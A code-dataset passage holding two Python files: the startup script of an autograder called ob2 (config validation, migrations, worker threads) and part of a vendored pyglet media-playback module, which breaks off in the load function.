source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
__main__.py
|
import logging
import signal
import sys
import traceback
from threading import Thread
import ob2.config as config
import ob2.dockergrader
import ob2.mailer
import ob2.repomanager
import ob2.web
from ob2.database.migrations import migrate
from ob2.database.validation import validate_database_constraints
from ob2.dockergrader import reset_grader
from ob2.mailer import mailer_queue
from ob2.repomanager import repomanager_queue
from ob2.util.config_data import validate_config
from ob2.database import DbCursor # noqa (for --ipython mode)
from ob2.util.github_api import _get_github_admin # noqa (for --ipython mode)
def main():
# Runs code in "functions.py" files, provided in configuration directories.
config.exec_custom_functions()
# Sets up logging
if config.debug_mode:
logging.getLogger().setLevel(logging.DEBUG)
logging.debug("Setting log level to DEBUG (debug_mode is enabled)")
# Set up graceful exit for SIGTERM (so finally clauses might have a chance to execute)
def handle_sigterm(*args):
logging.warn("Exiting due to SIGTERM")
sys.exit(0)
signal.signal(signal.SIGTERM, handle_sigterm)
# Validates constraints on the configuration data (does not touch database)
validate_config()
# Performs database migrations as needed
migrate()
# Validates constraints on the configuration data and database data in conjunction
validate_database_constraints()
if config.mode == "ipython":
# If we're running --ipython mode, STOP here (don't interfere with a server that may be
# running simultaneuosly). Launch the IPython shell and wait for user input.
import IPython
return IPython.embed()
elif config.mode == "server":
# Run ob2 in server mode.
#
# First, we clean up our resumable queues by re-enqueuing any half-completed transactions.
# Then, we reset the state of the local Docker daemon.
# Then, we start all our worker threads.
# Finally, the main thread goes to sleep until we receive a signal.
# Recovers the resumable queue used for the mailer thread (if mailer is enabled)
if config.mailer_enabled:
mailer_queue.recover()
# Recovers the resumable queue used for the GitHub API thread (if GitHub is NOT in read-only
# mode)
if not config.github_read_only_mode:
repomanager_queue.recover()
# Clears out stray Docker containers and images
reset_grader()
# Start background threads for all the apps
# Warning: Do not try to start more than 1 web thread. The web server is already threaded.
apps = [(ob2.dockergrader, 3),
(ob2.web, 1)]
if config.mailer_enabled:
apps.append((ob2.mailer, 1))
if not config.github_read_only_mode:
# The GitHub repo manager thread is only needed if GitHub is NOT in read-only mode
apps.append((ob2.repomanager, 1))
for app, num_workers in apps:
for _ in range(num_workers):
worker = Thread(target=app.main)
worker.daemon = True
worker.start()
# Wait until we're asked to quit
while True:
try:
signal.pause()
except (KeyboardInterrupt, SystemExit):
logging.warn("Shutting down.. Goodbye world.")
break
except:
traceback.print_exc()
if __name__ == '__main__':
main()
|
__init__.py
|
# ----------------------------------------------------------------------------
# fos.lib.pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of fos.lib.pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
# $Id$
'''Audio and video playback.
pyglet can play WAV files, and if AVbin is installed, many other audio and
video formats.
Playback is handled by the `Player` class, which reads raw data from `Source`
objects and provides methods for pausing, seeking, adjusting the volume, and
so on. The `Player` class implements a the best available audio device
(currently, only OpenAL is supported)::
player = Player()
A `Source` is used to decode arbitrary audio and video files. It is
associated with a single player by "queuing" it::
source = load('background_music.mp3')
player.queue(source)
Use the `Player` to control playback.
If the source contains video, the `Source.video_format` attribute will be
non-None, and the `Player.texture` attribute will contain the current video
image synchronised to the audio.
Decoding sounds can be processor-intensive and may introduce latency,
particularly for short sounds that must be played quickly, such as bullets or
explosions. You can force such sounds to be decoded and retained in memory
rather than streamed from disk by wrapping the source in a `StaticSource`::
bullet_sound = StaticSource(load('bullet.wav'))
The other advantage of a `StaticSource` is that it can be queued on any number
of players, and so played many times simultaneously.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import atexit
import ctypes
import heapq
import sys
import threading
import time
import fos.lib.pyglet
from fos.lib.pyglet.compat import bytes_type, BytesIO
_debug = fos.lib.pyglet.options['debug_media']
class MediaException(Exception):
pass
class MediaFormatException(MediaException):
pass
class CannotSeekException(MediaException):
pass
class MediaThread(object):
'''A thread that cleanly exits on interpreter shutdown, and provides
a sleep method that can be interrupted and a termination method.
:Ivariables:
`condition` : threading.Condition
Lock condition on all instance variables.
`stopped` : bool
True if `stop` has been called.
'''
_threads = set()
_threads_lock = threading.Lock()
def __init__(self, target=None):
self._thread = threading.Thread(target=self._thread_run)
self._thread.setDaemon(True)
if target is not None:
self.run = target
self.condition = threading.Condition()
self.stopped = False
@classmethod
def _atexit(cls):
cls._threads_lock.acquire()
threads = list(cls._threads)
cls._threads_lock.release()
for thread in threads:
thread.stop()
def run(self):
pass
def _thread_run(self):
if fos.lib.pyglet.options['debug_trace']:
fos.lib.pyglet._install_trace()
self._threads_lock.acquire()
self._threads.add(self)
self._threads_lock.release()
self.run()
self._threads_lock.acquire()
self._threads.remove(self)
self._threads_lock.release()
def start(self):
self._thread.start()
def stop(self):
'''Stop the thread and wait for it to terminate.
The `stop` instance variable is set to ``True`` and the condition is
notified. It is the responsibility of the `run` method to check
the value of `stop` after each sleep or wait and to return if set.
'''
if _debug:
print 'MediaThread.stop()'
self.condition.acquire()
self.stopped = True
self.condition.notify()
self.condition.release()
self._thread.join()
def sleep(self, timeout):
'''Wait for some amount of time, or until notified.
:Parameters:
`timeout` : float
Time to wait, in seconds.
'''
if _debug:
print 'MediaThread.sleep(%r)' % timeout
self.condition.acquire()
self.condition.wait(timeout)
self.condition.release()
def notify(self):
'''Interrupt the current sleep operation.
If the thread is currently sleeping, it will be woken immediately,
instead of waiting the full duration of the timeout.
'''
if _debug:
print 'MediaThread.notify()'
self.condition.acquire()
self.condition.notify()
self.condition.release()
atexit.register(MediaThread._atexit)
class WorkerThread(MediaThread):
def __init__(self, target=None):
super(WorkerThread, self).__init__(target)
self._jobs = []
def run(self):
while True:
job = self.get_job()
if not job:
break
job()
def get_job(self):
self.condition.acquire()
while self._empty() and not self.stopped:
self.condition.wait()
if self.stopped:
result = None
else:
result = self._get()
self.condition.release()
return result
def put_job(self, job):
self.condition.acquire()
self._put(job)
self.condition.notify()
self.condition.release()
def clear_jobs(self):
self.condition.acquire()
self._clear()
self.condition.notify()
self.condition.release()
def _empty(self):
return not self._jobs
def _get(self):
return self._jobs.pop(0)
def _put(self, job):
self._jobs.append(job)
def _clear(self):
del self._jobs[:]
class AudioFormat(object):
'''Audio details.
An instance of this class is provided by sources with audio tracks. You
should not modify the fields, as they are used internally to describe the
format of data provided by the source.
:Ivariables:
`channels` : int
The number of channels: 1 for mono or 2 for stereo (fos.lib.pyglet does
not yet support surround-sound sources).
`sample_size` : int
Bits per sample; only 8 or 16 are supported.
`sample_rate` : int
Samples per second (in Hertz).
'''
def __init__(self, channels, sample_size, sample_rate):
self.channels = channels
self.sample_size = sample_size
self.sample_rate = sample_rate
# Convenience
self.bytes_per_sample = (sample_size >> 3) * channels
self.bytes_per_second = self.bytes_per_sample * sample_rate
def __eq__(self, other):
return (self.channels == other.channels and
self.sample_size == other.sample_size and
self.sample_rate == other.sample_rate)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return '%s(channels=%d, sample_size=%d, sample_rate=%d)' % (
self.__class__.__name__, self.channels, self.sample_size,
self.sample_rate)
class VideoFormat(object):
'''Video details.
An instance of this class is provided by sources with a video track. You
should not modify the fields.
Note that the sample aspect has no relation to the aspect ratio of the
video image. For example, a video image of 640x480 with sample aspect 2.0
should be displayed at 1280x480. It is the responsibility of the
application to perform this scaling.
:Ivariables:
`width` : int
Width of video image, in pixels.
`height` : int
Height of video image, in pixels.
`sample_aspect` : float
Aspect ratio (width over height) of a single video pixel.
`frame_rate` : float
Frame rate (frames per second) of the video.
AVbin 8 or later is required, otherwise the frame rate will be
``None``.
**Since:** fos.lib.pyglet 1.2.
'''
def __init__(self, width, height, sample_aspect=1.0):
self.width = width
self.height = height
self.sample_aspect = sample_aspect
self.frame_rate = None
class AudioData(object):
'''A single packet of audio data.
This class is used internally by fos.lib.pyglet.
:Ivariables:
`data` : str or ctypes array or pointer
Sample data.
`length` : int
Size of sample data, in bytes.
`timestamp` : float
Time of the first sample, in seconds.
`duration` : float
Total data duration, in seconds.
`events` : list of MediaEvent
List of events contained within this packet. Events are
timestamped relative to this audio packet.
'''
def __init__(self, data, length, timestamp, duration, events):
self.data = data
self.length = length
self.timestamp = timestamp
self.duration = duration
self.events = events
def consume(self, bytes, audio_format):
'''Remove some data from beginning of packet. All events are
cleared.'''
self.events = ()
if bytes == self.length:
self.data = None
self.length = 0
self.timestamp += self.duration
self.duration = 0.
return
elif bytes == 0:
return
if not isinstance(self.data, str):
# XXX Create a string buffer for the whole packet then
# chop it up. Could do some pointer arith here and
# save a bit of data pushing, but my guess is this is
# faster than fudging aruond with ctypes (and easier).
data = ctypes.create_string_buffer(self.length)
ctypes.memmove(data, self.data, self.length)
self.data = data
self.data = self.data[bytes:]
self.length -= bytes
self.duration -= bytes / float(audio_format.bytes_per_second)
self.timestamp += bytes / float(audio_format.bytes_per_second)
def get_string_data(self):
'''Return data as a string. (Python 3: return as bytes)'''
if isinstance(self.data, bytes_type):
return self.data
buf = ctypes.create_string_buffer(self.length)
ctypes.memmove(buf, self.data, self.length)
return buf.raw
class MediaEvent(object):
def __init__(self, timestamp, event, *args):
# Meaning of timestamp is dependent on context; and not seen by
# application.
self.timestamp = timestamp
self.event = event
self.args = args
def _sync_dispatch_to_player(self, player):
fos.lib.pyglet.app.platform_event_loop.post_event(player, self.event, *self.args)
time.sleep(0)
# TODO sync with media.dispatch_events
def __repr__(self):
return '%s(%r, %r, %r)' % (self.__class__.__name__,
self.timestamp, self.event, self.args)
class SourceInfo(object):
'''Source metadata information.
Fields are the empty string or zero if the information is not available.
:Ivariables:
`title` : str
Title
`author` : str
Author
`copyright` : str
Copyright statement
`comment` : str
Comment
`album` : str
Album name
`year` : int
Year
`track` : int
Track number
`genre` : str
Genre
:since: fos.lib.pyglet 1.2
'''
title = ''
author = ''
copyright = ''
comment = ''
album = ''
year = 0
track = 0
genre = ''
class Source(object):
'''An audio and/or video source.
:Ivariables:
`audio_format` : `AudioFormat`
Format of the audio in this source, or None if the source is
silent.
`video_format` : `VideoFormat`
Format of the video in this source, or None if there is no
video.
`info` : `SourceInfo`
Source metadata such as title, artist, etc; or None if the
information is not available.
**Since:** fos.lib.pyglet 1.2
'''
_duration = None
audio_format = None
video_format = None
info = None
def _get_duration(self):
return self._duration
duration = property(lambda self: self._get_duration(),
doc='''The length of the source, in seconds.
Not all source durations can be determined; in this case the value
is None.
Read-only.
:type: float
''')
def play(self):
'''Play the source.
This is a convenience method which creates a ManagedSoundPlayer for
this source and plays it immediately.
:rtype: `ManagedSoundPlayer`
'''
player = ManagedSoundPlayer()
player.queue(self)
player.play()
return player
def get_animation(self):
'''Import all video frames into memory as an `Animation`.
An empty animation will be returned if the source has no video.
Otherwise, the animation will contain all unplayed video frames (the
entire source, if it has not been queued on a player). After creating
the animation, the source will be at EOS.
This method is unsuitable for videos running longer than a
few seconds.
:since: fos.lib.pyglet 1.1
:rtype: `pyglet.image.Animation`
'''
from fos.lib.pyglet.image import Animation, AnimationFrame
if not self.video_format:
return Animation([])
else:
frames = []
last_ts = 0
next_ts = self.get_next_video_timestamp()
while next_ts is not None:
image = self.get_next_video_frame()
if image is not None:
delay = next_ts - last_ts
frames.append(AnimationFrame(image, delay))
last_ts = next_ts
next_ts = self.get_next_video_timestamp()
return Animation(frames)
def get_next_video_timestamp(self):
'''Get the timestamp of the next video frame.
:since: fos.lib.pyglet 1.1
:rtype: float
:return: The next timestamp, or ``None`` if there are no more video
frames.
'''
pass
def get_next_video_frame(self):
'''Get the next video frame.
Video frames may share memory: the previous frame may be invalidated
or corrupted when this method is called unless the application has
made a copy of it.
:since: fos.lib.pyglet 1.1
:rtype: `pyglet.image.AbstractImage`
:return: The next video frame image, or ``None`` if the video frame
could not be decoded or there are no more video frames.
'''
pass
# Internal methods that SourceGroup calls on the source:
def seek(self, timestamp):
'''Seek to given timestamp.'''
raise CannotSeekException()
def _get_queue_source(self):
'''Return the `Source` to be used as the queue source for a player.
Default implementation returns self.'''
return self
def get_audio_data(self, bytes):
'''Get next packet of audio data.
:Parameters:
`bytes` : int
Maximum number of bytes of data to return.
:rtype: `AudioData`
:return: Next packet of audio data, or None if there is no (more)
data.
'''
return None
class StreamingSource(Source):
'''A source that is decoded as it is being played, and can only be
queued once.
'''
_is_queued = False
is_queued = property(lambda self: self._is_queued,
doc='''Determine if this source has been queued
on a `Player` yet.
Read-only.
:type: bool
''')
def _get_queue_source(self):
'''Return the `Source` to be used as the queue source for a player.
Default implementation returns self.'''
if self._is_queued:
raise MediaException('This source is already queued on a player.')
self._is_queued = True
return self
class StaticSource(Source):
'''A source that has been completely decoded in memory. This source can
be queued onto multiple players any number of times.
'''
def __init__(self, source):
'''Construct a `StaticSource` for the data in `source`.
:Parameters:
`source` : `Source`
The source to read and decode audio and video data from.
'''
source = source._get_queue_source()
if source.video_format:
raise NotImplementedError(
'Static sources not supported for video yet.')
self.audio_format = source.audio_format
if not self.audio_format:
return
# Arbitrary: number of bytes to request at a time.
buffer_size = 1 << 20 # 1 MB
# Naive implementation. Driver-specific implementations may override
# to load static audio data into device (or at least driver) memory.
data = BytesIO()
while True:
audio_data = source.get_audio_data(buffer_size)
if not audio_data:
break
data.write(audio_data.get_string_data())
self._data = data.getvalue()
self._duration = len(self._data) / \
float(self.audio_format.bytes_per_second)
def _get_queue_source(self):
return StaticMemorySource(self._data, self.audio_format)
def get_audio_data(self, bytes):
raise RuntimeError('StaticSource cannot be queued.')
class StaticMemorySource(StaticSource):
'''Helper class for default implementation of `StaticSource`. Do not use
directly.'''
def __init__(self, data, audio_format):
'''Construct a memory source over the given data buffer.
'''
self._file = BytesIO(data)
self._max_offset = len(data)
self.audio_format = audio_format
self._duration = len(data) / float(audio_format.bytes_per_second)
def seek(self, timestamp):
offset = int(timestamp * self.audio_format.bytes_per_second)
# Align to sample
if self.audio_format.bytes_per_sample == 2:
offset &= 0xfffffffe
elif self.audio_format.bytes_per_sample == 4:
offset &= 0xfffffffc
self._file.seek(offset)
def get_audio_data(self, bytes):
offset = self._file.tell()
timestamp = float(offset) / self.audio_format.bytes_per_second
# Align to sample size
if self.audio_format.bytes_per_sample == 2:
bytes &= 0xfffffffe
elif self.audio_format.bytes_per_sample == 4:
bytes &= 0xfffffffc
data = self._file.read(bytes)
if not len(data):
return None
duration = float(len(data)) / self.audio_format.bytes_per_second
return AudioData(data, len(data), timestamp, duration, [])
class SourceGroup(object):
'''Read data from a queue of sources, with support for looping. All
sources must share the same audio format.
:Ivariables:
`audio_format` : `AudioFormat`
Required audio format for queued sources.
'''
# TODO can sources list go empty? what behaviour (ignore or error)?
_advance_after_eos = False
_loop = False
def __init__(self, audio_format, video_format):
self.audio_format = audio_format
self.video_format = video_format
self.duration = 0.
self._timestamp_offset = 0.
self._dequeued_durations = []
self._sources = []
def seek(self, time):
if self._sources:
self._sources[0].seek(time)
def queue(self, source):
source = source._get_queue_source()
assert(source.audio_format == self.audio_format)
self._sources.append(source)
self.duration += source.duration
def has_next(self):
return len(self._sources) > 1
def next(self, immediate=True):
if immediate:
self._advance()
else:
self._advance_after_eos = True
def get_current_source(self):
if self._sources:
return self._sources[0]
def _advance(self):
if self._sources:
self._timestamp_offset += self._sources[0].duration
self._dequeued_durations.insert(0, self._sources[0].duration)
old_source = self._sources.pop(0)
self.duration -= old_source.duration
def _get_loop(self):
return self._loop
def _set_loop(self, loop):
self._loop = loop
loop = property(_get_loop, _set_loop,
doc='''Loop the current source indefinitely or until
`next` is called. Initially False.
:type: bool
''')
def get_audio_data(self, bytes):
'''Get next audio packet.
:Parameters:
`bytes` : int
Hint for preferred size of audio packet; may be ignored.
:rtype: `AudioData`
:return: Audio data, or None if there is no more data.
'''
data = self._sources[0].get_audio_data(bytes)
eos = False
while not data:
eos = True
if self._loop and not self._advance_after_eos:
self._timestamp_offset += self._sources[0].duration
self._dequeued_durations.insert(0, self._sources[0].duration)
self._sources[0].seek(0)
else:
self._advance_after_eos = False
# Advance source if there's something to advance to.
# Otherwise leave last source paused at EOS.
if len(self._sources) > 1:
self._advance()
else:
return None
data = self._sources[0].get_audio_data(bytes) # TODO method rename
data.timestamp += self._timestamp_offset
if eos:
if _debug:
print 'adding on_eos event to audio data'
data.events.append(MediaEvent(0, 'on_eos'))
return data
def translate_timestamp(self, timestamp):
'''Get source-relative timestamp for the audio player's timestamp.'''
# XXX
if timestamp is None:
return None
timestamp = timestamp - self._timestamp_offset
if timestamp < 0:
for duration in self._dequeued_durations[::-1]:
timestamp += duration
if timestamp > 0:
break
assert timestamp >= 0, 'Timestamp beyond dequeued source memory'
return timestamp
def get_next_video_timestamp(self):
'''Get the timestamp of the next video frame.
:rtype: float
:return: The next timestamp, or ``None`` if there are no more video
frames.
'''
# TODO track current video source independently from audio source for
# better prebuffering.
timestamp = self._sources[0].get_next_video_timestamp()
if timestamp is not None:
timestamp += self._timestamp_offset
return timestamp
def get_next_video_frame(self):
'''Get the next video frame.
Video frames may share memory: the previous frame may be invalidated
or corrupted when this method is called unless the application has
made a copy of it.
:rtype: `pyglet.image.AbstractImage`
:return: The next video frame image, or ``None`` if the video frame
could not be decoded or there are no more video frames.
'''
return self._sources[0].get_next_video_frame()
class AbstractAudioPlayer(object):
'''Base class for driver audio players.
'''
def __init__(self, source_group, player):
'''Create a new audio player.
:Parameters:
`source_group` : `SourceGroup`
Source group to play from.
`player` : `Player`
Player to receive EOS and video frame sync events.
'''
self.source_group = source_group
self.player = player
def play(self):
'''Begin playback.'''
raise NotImplementedError('abstract')
def stop(self):
'''Stop (pause) playback.'''
raise NotImplementedError('abstract')
def delete(self):
'''Stop playing and clean up all resources used by player.'''
raise NotImplementedError('abstract')
def _play_group(self, audio_players):
'''Begin simultaneous playback on a list of audio players.'''
# This should be overridden by subclasses for better synchrony.
for player in audio_players:
player.play()
def _stop_group(self, audio_players):
'''Stop simultaneous playback on a list of audio players.'''
# This should be overridden by subclasses for better synchrony.
for player in audio_players:
player.play()
def clear(self):
'''Clear all buffered data and prepare for replacement data.
The player should be stopped before calling this method.
'''
raise NotImplementedError('abstract')
def get_time(self):
'''Return approximation of current playback time within current source.
Returns ``None`` if the audio player does not know what the playback
time is (for example, before any valid audio data has been read).
:rtype: float
:return: current play cursor time, in seconds.
'''
# TODO determine which source within group
raise NotImplementedError('abstract')
def set_volume(self, volume):
'''See `Player.volume`.'''
pass
def set_position(self, position):
'''See `Player.position`.'''
pass
def set_min_distance(self, min_distance):
'''See `Player.min_distance`.'''
pass
def set_max_distance(self, max_distance):
'''See `Player.max_distance`.'''
pass
def set_pitch(self, pitch):
'''See `Player.pitch`.'''
pass
def set_cone_orientation(self, cone_orientation):
'''See `Player.cone_orientation`.'''
pass
def set_cone_inner_angle(self, cone_inner_angle):
'''See `Player.cone_inner_angle`.'''
pass
def set_cone_outer_angle(self, cone_outer_angle):
'''See `Player.cone_outer_angle`.'''
pass
def set_cone_outer_gain(self, cone_outer_gain):
'''See `Player.cone_outer_gain`.'''
pass
class Player(fos.lib.pyglet.event.EventDispatcher):
'''High-level sound and video player.
'''
_last_video_timestamp = None
_texture = None
# Spacialisation attributes, preserved between audio players
_volume = 1.0
_min_distance = 1.0
_max_distance = 100000000.
_position = (0, 0, 0)
_pitch = 1.0
_cone_orientation = (0, 0, 1)
_cone_inner_angle = 360.
_cone_outer_angle = 360.
_cone_outer_gain = 1.
#: The player will pause when it reaches the end of the stream.
#:
#: :deprecated: Use `SourceGroup.advance_after_eos`
EOS_PAUSE = 'pause'
#: The player will loop the current stream continuosly.
#:
#: :deprecated: Use `SourceGroup.loop`
EOS_LOOP = 'loop'
#: The player will move on to the next queued stream when it reaches the
#: end of the current source. If there is no source queued, the player
#: will pause.
#:
#: :deprecated: Use `SourceGroup.advance_after_eos`
EOS_NEXT = 'next'
#: The player will stop entirely; valid only for ManagedSoundPlayer.
#:
#: :deprecated: Use `SourceGroup.advance_after_eos`
EOS_STOP = 'stop'
#: :deprecated:
_eos_action = EOS_NEXT
def __init__(self):
# List of queued source groups
self._groups = []
self._audio_player = None
# Desired play state (not an indication of actual state).
self._playing = False
self._paused_time = 0.0
def queue(self, source):
if (self._groups and
source.audio_format == self._groups[-1].audio_format and
source.video_format == self._groups[-1].video_format):
self._groups[-1].queue(source)
else:
group = SourceGroup(source.audio_format, source.video_format)
group.queue(source)
self._groups.append(group)
self._set_eos_action(self._eos_action)
self._set_playing(self._playing)
def _set_playing(self, playing):
#stopping = self._playing and not playing
#starting = not self._playing and playing
self._playing = playing
source = self.source
if playing and source:
if not self._audio_player:
self._create_audio_player()
self._audio_player.play()
if source.video_format:
if not self._texture:
self._create_texture()
if self.source.video_format.frame_rate:
period = 1. / self.source.video_format.frame_rate
else:
period = 1. / 30.
fos.lib.pyglet.clock.schedule_interval(self.update_texture, period)
else:
if self._audio_player:
self._audio_player.stop()
fos.lib.pyglet.clock.unschedule(self.update_texture)
def play(self):
self._set_playing(True)
def pause(self):
self._set_playing(False)
if self._audio_player:
time = self._audio_player.get_time()
time = self._groups[0].translate_timestamp(time)
if time is not None:
self._paused_time = time
self._audio_player.stop()
def next(self):
if not self._groups:
return
group = self._groups[0]
if group.has_next():
group.next()
return
if self.source.video_format:
self._texture = None
fos.lib.pyglet.clock.unschedule(self.update_texture)
if self._audio_player:
self._audio_player.delete()
self._audio_player = None
del self._groups[0]
if self._groups:
self._set_playing(self._playing)
return
self._set_playing(False)
self.dispatch_event('on_player_eos')
def seek(self, time):
if _debug:
print 'Player.seek(%r)' % time
self._paused_time = time
self.source.seek(time)
if self._audio_player: self._audio_player.clear()
if self.source.video_format:
self._last_video_timestamp = None
self.update_texture(time=time)
def _create_audio_player(self):
assert not self._audio_player
assert self._groups
group = self._groups[0]
audio_format = group.audio_format
if audio_format:
audio_driver = get_audio_driver()
else:
audio_driver = get_silent_audio_driver()
self._audio_player = audio_driver.create_audio_player(group, self)
_class = self.__class__
def _set(name):
private_name = '_' + name
value = getattr(self, private_name)
if value != getattr(_class, private_name):
getattr(self._audio_player, 'set_' + name)(value)
_set('volume')
_set('min_distance')
_set('max_distance')
_set('position')
_set('pitch')
_set('cone_orientation')
_set('cone_inner_angle')
_set('cone_outer_angle')
_set('cone_outer_gain')
def _get_source(self):
if not self._groups:
return None
return self._groups[0].get_current_source()
source = property(_get_source)
playing = property(lambda self: self._playing)
def _get_time(self):
time = None
if self._playing and self._audio_player:
time = self._audio_player.get_time()
time = self._groups[0].translate_timestamp(time)
if time is None:
return self._paused_time
else:
return time
time = property(_get_time)
def _create_texture(self):
video_format = self.source.video_format
self._texture = fos.lib.pyglet.image.Texture.create(
video_format.width, video_format.height, rectangle=True)
self._texture = self._texture.get_transform(flip_y=True)
self._texture.anchor_y = 0
def get_texture(self):
return self._texture
def seek_next_frame(self):
'''Step forwards one video frame in the current Source.
'''
time = self._groups[0].get_next_video_timestamp()
if time is None:
return
self.seek(time)
def update_texture(self, dt=None, time=None):
if time is None:
time = self._audio_player.get_time()
if time is None:
return
if (self._last_video_timestamp is not None and
time <= self._last_video_timestamp):
return
ts = self._groups[0].get_next_video_timestamp()
while ts is not None and ts < time:
self._groups[0].get_next_video_frame() # Discard frame
ts = self._groups[0].get_next_video_timestamp()
if ts is None:
self._last_video_timestamp = None
return
image = self._groups[0].get_next_video_frame()
if image is not None:
if self._texture is None:
self._create_texture()
self._texture.blit_into(image, 0, 0, 0)
self._last_video_timestamp = ts
def _set_eos_action(self, eos_action):
''':deprecated:'''
assert eos_action in (self.EOS_NEXT, self.EOS_STOP,
self.EOS_PAUSE, self.EOS_LOOP)
self._eos_action = eos_action
for group in self._groups:
group.loop = eos_action == self.EOS_LOOP
group.advance_after_eos = eos_action == self.EOS_NEXT
eos_action = property(lambda self: self._eos_action,
_set_eos_action,
doc='''Set the behaviour of the player when it
reaches the end of the current source.
This must be one of the constants `EOS_NEXT`, `EOS_PAUSE`, `EOS_STOP` or
`EOS_LOOP`.
:deprecated: Use `SourceGroup.loop` and `SourceGroup.advance_after_eos`
:type: str
''')
def _player_property(name, doc=None):
private_name = '_' + name
set_name = 'set_' + name
def _player_property_set(self, value):
setattr(self, private_name, value)
if self._audio_player:
getattr(self._audio_player, set_name)(value)
def _player_property_get(self):
return getattr(self, private_name)
return property(_player_property_get, _player_property_set, doc=doc)
# TODO docstrings for these...
volume = _player_property('volume')
min_distance = _player_property('min_distance')
max_distance = _player_property('max_distance')
position = _player_property('position')
pitch = _player_property('pitch')
cone_orientation = _player_property('cone_orientation')
cone_inner_angle = _player_property('cone_inner_angle')
cone_outer_angle = _player_property('cone_outer_angle')
cone_outer_gain = _player_property('cone_outer_gain')
# Events
def on_player_eos(self):
'''The player ran out of sources.
:event:
'''
if _debug:
print 'Player.on_player_eos'
def on_source_group_eos(self):
'''The current source group ran out of data.
The default behaviour is to advance to the next source group if
possible.
:event:
'''
self.next()
if _debug:
print 'Player.on_source_group_eos'
def on_eos(self):
'''
:event:
'''
if _debug:
print 'Player.on_eos'
Player.register_event_type('on_eos')
Player.register_event_type('on_player_eos')
Player.register_event_type('on_source_group_eos')
class ManagedSoundPlayer(Player):
''':deprecated: Use `Player`'''
pass
class PlayerGroup(object):
'''Group of players that can be played and paused simultaneously.
:Ivariables:
`players` : list of `Player`
Players in this group.
'''
def __init__(self, players):
'''Create a player group for the given set of players.
All players in the group must currently not belong to any other
group.
:Parameters:
`players` : Sequence of `Player`
Players to add to this group.
'''
self.players = list(players)
def play(self):
'''Begin playing all players in the group simultaneously.
'''
audio_players = [p._audio_player \
for p in self.players if p._audio_player]
if audio_players:
audio_players[0]._play_group(audio_players)
for player in self.players:
player.play()
def pause(self):
'''Pause all players in the group simultaneously.
'''
audio_players = [p._audio_player \
for p in self.players if p._audio_player]
if audio_players:
audio_players[0]._stop_group(audio_players)
for player in self.players:
player.pause()
class AbstractAudioDriver(object):
def create_audio_player(self, source_group, player):
raise NotImplementedError('abstract')
def get_listener(self):
raise NotImplementedError('abstract')
class AbstractListener(object):
'''The listener properties for positional audio.
You can obtain the singleton instance of this class by calling
`AbstractAudioDriver.get_listener`.
'''
_volume = 1.0
_position = (0, 0, 0)
_forward_orientation = (0, 0, -1)
_up_orientation = (0, 1, 0)
def _set_volume(self, volume):
raise NotImplementedError('abstract')
volume = property(lambda self: self._volume,
lambda self, volume: self._set_volume(volume),
doc='''The master volume for sound playback.
All sound volumes are multiplied by this master volume before being
played. A value of 0 will silence playback (but still consume
resources). The nominal volume is 1.0.
:type: float
''')
def _set_position(self, position):
raise NotImplementedError('abstract')
position = property(lambda self: self._position,
lambda self, position: self._set_position(position),
doc='''The position of the listener in 3D space.
The position is given as a tuple of floats (x, y, z). The unit
defaults to meters, but can be modified with the listener
properties.
:type: 3-tuple of float
''')
def _set_forward_orientation(self, orientation):
raise NotImplementedError('abstract')
forward_orientation = property(lambda self: self._forward_orientation,
lambda self, o: self._set_forward_orientation(o),
doc='''A vector giving the direction the
listener is facing.
The orientation is given as a tuple of floats (x, y, z), and has
no unit. The forward orientation should be orthagonal to the
up orientation.
:type: 3-tuple of float
''')
def _set_up_orientation(self, orientation):
raise NotImplementedError('abstract')
up_orientation = property(lambda self: self._up_orientation,
lambda self, o: self._set_up_orientation(o),
doc='''A vector giving the "up" orientation
of the listener.
The orientation is given as a tuple of floats (x, y, z), and has
no unit. The up orientation should be orthagonal to the
forward orientation.
:type: 3-tuple of float
''')
class _LegacyListener(AbstractListener):
def _set_volume(self, volume):
get_audio_driver().get_listener().volume = volume
self._volume = volume
def _set_position(self, position):
get_audio_driver().get_listener().position = position
self._position = position
def _set_forward_orientation(self, forward_orientation):
get_audio_driver().get_listener().forward_orientation = \
forward_orientation
self._forward_orientation = forward_orientation
def _set_up_orientation(self, up_orientation):
get_audio_driver().get_listener().up_orientation = up_orientation
self._up_orientation = up_orientation
#: The singleton `AbstractListener` object.
#:
#: :deprecated: Use `AbstractAudioDriver.get_listener`
#:
#: :type: `AbstractListener`
listener = _LegacyListener()
class AbstractSourceLoader(object):
def load(self, filename, file):
raise NotImplementedError('abstract')
class AVbinSourceLoader(AbstractSourceLoader):
def load(self, filename, file):
import avbin
return avbin.AVbinSource(filename, file)
class RIFFSourceLoader(AbstractSourceLoader):
def load(self, filename, file):
import riff
return riff.WaveSource(filename, file)
def load(filename, file=None, streaming=True):
'''Load a source from a file.
Currently the `file` argument is not supported; media files must exist
as real paths.
:Parameters:
